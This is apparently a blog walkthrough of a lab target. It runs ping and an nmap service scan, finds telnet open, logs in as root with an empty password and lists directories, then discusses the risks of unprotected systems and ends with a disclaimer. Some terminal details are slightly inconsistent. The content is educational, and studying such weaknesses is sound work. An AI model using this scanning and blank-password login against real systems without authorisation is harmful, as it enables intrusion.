In the dynamic and complex realm of cybersecurity, the initial stages of a penetration test or any security evaluation are crucial. This journey begins with a critical process known as Enumeration, a meticulous step where understanding the target’s current state is paramount. The essence of Enumeration lies in gathering extensive knowledge about the target, forming the foundation for subsequent actions.

Entering the Target’s Virtual Realm

Imagine you’ve just gained access to the same network as your target. This is akin to having a direct line to the target, much like any regular user. Picture this: if your target is a web server hosting a public webpage, you’re just an IP address away from exploring its digital contents. And if it’s a storage server, the same IP can be your gateway to its digital vaults, given you have the right keys (credentials, in this case).

However, uncovering the target’s services isn’t a task for the impatient. It’s not about manual searches, which are time-consuming and impractical. Here’s where the understanding of server ports comes into play. Every server communicates and offers its services through these digital doorways. The initial steps in the Enumeration phase involve a systematic scan of these open ports. This scan isn’t just about identifying the target’s role in the network; it’s about uncovering potential vulnerabilities hidden within the services it runs.

Enumeration

We can ping the target’s IP address to see if our packets reach their destination. We can ping the target first to see if we receive any response back

$ ping 10.10.1.68

PING 10.10.1.68 (10.10.1.68) 56(84) bytes of data.
64 bytes from 10.10.1.68: icmp_seq=1 ttl=63 time=11.1 ms
64 bytes from 10.10.1.68: icmp_seq=2 ttl=63 time=889 ms
64 bytes from 10.10.1.68: icmp_seq=3 ttl=63 time=12.6 ms
64 bytes from 10.10.1.68: icmp_seq=4 ttl=63 time=83.0 ms
64 bytes from 10.10.1.68: icmp_seq=5 ttl=63 time=17.4 ms
64 bytes from 10.10.1.68: icmp_seq=6 ttl=63 time=254 ms
^C
--- 10.10.1.68 ping statistics ---
7 packets transmitted, 6 received, 14.2857% packet loss, time 6006ms
rtt min/avg/max/mdev = 11.104/211.160/889.162/314.884 ms

After receiving successful responses confirms that our connection is active and reliable. To stop the ping process, use the CTRL+C keys on your keyboard. It gives us back control of the terminal, allowing us to move to the next crucial step: port scanning.

To begin scanning the target’s open ports, we employ the nmap script. Nmap, short for Network Mapper, is designed to send requests to the target’s ports, identifying which ones are open. Different ports might be associated with specific services by default, while others could be non-standard. To accurately identify the services operating on these ports, we use the service detection flag -sV. This helps in determining both the name and the description of the services detected. This personalized input is crucial for the accuracy and success of your security evaluation.

$ sudo nmap -sV 10.10.1.68

[sudo] password for wirepost: 
Starting Nmap 7.93 ( https://nmap.org ) at 2024-01-17 20:05 GMT
Nmap scan report for 10.10.1.68
Host is up (0.93s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.54 seconds

In exploiting port 23, which is used for Telnet, the next step would typically involve attempting to connect to the Telnet service on the target system to check for potential vulnerabilities, such as default credentials or unsecured access points.

Telnet is a network protocol used for providing a command-line interface for communication with a remote device or server, primarily used for accessing and managing devices remotely. However, it is known for being insecure as it transmits data, including login credentials, in plain text, making it susceptible to eavesdropping.

At times, specific accounts may inadvertently be left without passwords due to setup errors, aiming for quick access. This oversight often affects network devices or systems, making them prone to straightforward brute-force attacks. In such scenarios, an attacker tries various login attempts using a series of common usernames, omitting the password field entirely.

To explore whether these accounts might be operational with empty passwords, one approach is to input these usernames directly into the terminal upon request during the login process. If dealing with a more extensive list of potential usernames, automating this task with a script that uses a username wordlist (and possibly a password list) would be more efficient.

The wordlists for this purpose often contain common personal names, common terms, or information sourced from past security breaches. In this specific scenario, a practical first step is to manually test it to see if they provide access.

$ telnet 10.10.1.68

Trying 10.10.1.68...
Connected to 10.10.1.68.
Escape character is '^]'.



Admin login: root
Welcome to Ubuntu 22.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Wed 15 Jan 2024 09:35:17 PM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             137
  Users logged in:       0
  IPv4 address for eth0: 10.10.1.68
  IPv6 address for eth0: dead:beef::250:56ff:fe96:6490

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  7 12:13:24 UTC 2021 from 10.10.1.23 on pts/0
root@Admin:~#

Now that we got root access we can do whatever we want in the system we even can access the /root directory and we can list to see what is in there

$ ll                                                                                                              
   r-xr-xr-x     1   root   root    166 B     Tue Jan 16 12:49:43 2024  ï„•  ./
   r-xr-xr-x     1   root   root    166 B     Tue Jan 16 12:49:43 2024  ï„•  ../
   r-xr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  ï„•  afs/
   rwxrwxrwx     1   root   root      7 B     Fri Jul 21 01:00:00 2023    bin  ⇒ usr/bin
   r-xr-xr-x     6   root   root      4 KiB   Tue Jan 16 12:52:56 2024  ï„•  boot/
   rwxr-xr-x    22   root   root      4 KiB   Wed Jan 12 19:06:32 2024  ï„•  dev/
   rwxr-xr-x     1   root   root      5 KiB   Wed Jan 12 20:12:33 2024  ï„•  etc/
   rwxr-xr-x     1   root   root     12 B     Fri Jul 21 01:00:00 2023  ï„•  home/
   rwxrwxrwx     1   root   root      7 B     Fri Jul 21 01:00:00 2023    lib  ⇒ usr/lib
   rwxrwxrwx     1   root   root      9 B     Fri Jul 21 01:00:00 2023    lib64  ⇒ usr/lib64
   rwx------     1   root   root      0 B     Thu Apr 13 22:42:06 2023  ï„•  lost+found/
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  ï„•  media/
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  ï„•  mnt/
   rwxr-xr-x     1   root   root    368 B     Fri Dec 15 00:48:52 2023  ï„•  opt/
   r-xr-xr-x   766   root   root      0 B     Wed Jan 12 10:05:22 2024  ï„•  proc/
   r-xr-x---     1   root   root    286 B     Sun Jan 14 14:49:59 2024  ï„•  root/
   rwxr-xr-x    52   root   root      1 KiB   Wed Jan 12 20:12:33 2024  ï„•  run/
   rwxrwxrwx     1   root   root      8 B     Fri Jul 21 01:00:00 2023    sbin  ⇒ usr/sbin
   rwxrwxrwx     1   root   root     19 B     Thu Sep 21 21:50:14 2023    snap  ⇒ /var/lib/snapd/snap
   rwxr-xr-x     1   root   root      0 B     Fri Jul 21 01:00:00 2023  ï„•  srv/
   r-xr-xr-x    13   root   root      0 B     Wed Jan 12 10:06:22 2024  ï„•  sys/
   rwxrwxrwt    34   root   root    920 B     Wed Jan 12 20:32:41 2024  ï„•  tmp/
   rwxr-xr-x     1   root   root    200 B     Sat Dec  2 18:07:20 2023  ï„•  usr/
   rwxr-xr-x     1   root   root    208 B     Sat Dec  2 18:25:20 2023  ï„•  var/

Gaining root access to a system, as illustrated in the provided Telnet session, underscores a crucial point about cybersecurity: the peril of leaving systems unprotected. This scenario, where access was attained with minimal resistance, exemplifies a significant lapse in security protocols that can lead to dire consequences.

Understanding the Risks of Unprotected Systems

  1. Unrestricted Access: The ease with which root access was obtained in this case highlights how simple oversights, such as not securing login credentials, can leave a system wide open for unauthorized access. Root access means complete control over the system, allowing an intruder to manipulate, steal, or destroy data.
  2. Potential for Widespread Damage: With root access, attackers can install malicious software, create backdoors for future access, or even use the compromised system as a launchpad for attacks on other systems. The potential for damage is enormous, ranging from financial loss to legal liabilities and reputation damage.
  3. Data Breach and Privacy Violations: An unprotected system is a treasure trove for cybercriminals. It can lead to significant data breaches, exposing sensitive information such as personal data, financial records, or confidential business information.
  4. Compliance and Legal Issues: Many industries have strict regulations regarding data protection and privacy. An unprotected system not only poses security risks but also legal and compliance risks, which can result in hefty fines and legal repercussions.
  5. Loss of Trust: For businesses, a security breach can lead to a loss of customer trust, which is often more devastating than the immediate financial impact. Restoring reputation and customer confidence can be a lengthy and challenging process.

Conclusion: The Imperative of Robust Cybersecurity

The scenario of gaining root access with minimal effort is a stark reminder of the critical importance of robust cybersecurity measures. It’s essential for individuals and organizations to recognize the risks of leaving systems unprotected and to take proactive steps to secure their digital assets. This includes regular security audits, implementing strong password policies, keeping systems updated, and educating users about security best practices.

In today’s digital age, where cyber threats are ever-evolving, the cost of complacency can be extraordinarily high. Protecting digital assets is not just a technical necessity but a fundamental responsibility to safeguard data, privacy, and the integrity of systems and networks.

Disclaimer

The content presented in this blog post is intended for educational and informational purposes only. The scenarios and methods described are based on hypothetical situations in a controlled environment and should not be replicated or interpreted as encouragement for unauthorized or illegal activities.

Readers are advised that accessing, probing, or manipulating computer systems without explicit permission is illegal and unethical. The author and publisher of this blog bear no responsibility for any misuse of the information provided.

This post aims to raise awareness about cybersecurity risks and the importance of implementing strong security measures. It is crucial for individuals and organizations to adhere to legal and ethical standards in all cybersecurity activities.

RELATED ARTICLESMORE FROM AUTHOR

LEAVE A REPLY

Please enter your comment!
Please enter your name here